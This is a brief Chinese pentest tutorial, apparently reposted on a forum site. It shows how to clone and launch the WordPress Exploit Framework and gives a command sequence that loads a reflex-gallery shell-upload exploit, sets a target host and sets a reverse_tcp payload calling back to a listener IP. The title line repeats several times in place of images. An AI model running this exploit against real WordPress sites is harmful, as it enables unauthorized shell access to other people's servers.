使用WordPress框架漏洞在WordPress网站中进行渗透测试

用于开发和使用模块的Ruby框架,可帮助对WordPress驱动的网站和系统进行渗透测试
首先从github克隆WPXF存储库,类型下载:
https://github.com/rastating/wordpress-exploit-framework.git
使用WordPress漏洞利用框架在WordPress网站中进行渗透测试
现在在你已经下载WordPress漏洞利用程序框架的目录中打开kali linux终端,并通过运行ruby wpxf.rb启动它  。
使用WordPress漏洞利用框架在WordPress网站中进行渗透测试
加载后,您将看到wpxf提示符,从这里您可以使用搜索命令搜索模块或使用use命令加载模块。
wpxf > use exploit/refelex_gallery_shell_upload
wpxf [exploit/ refelex_gallery_shell_upload] > set host 192.168.0.104
wpxf [exploit/ refelex_gallery_shell_upload] > set target_uri /
wpxf [exploit/ refelex_gallery_shell_upload] > set payload reverse_tcp
wpxf [exploit/ refelex_gallery_shell_upload] > set lhost 192.168.0.105
wpxf [exploit/ refelex_gallery_shell_upload] > run
使用WordPress漏洞利用框架在WordPress网站中进行渗透测试
使用WordPress漏洞利用框架在WordPress网站中进行渗透测试
转载请注明本文链接: http://www.mayidui.net/t2325.html
游客
登录后才可以回帖,登录 或者 注册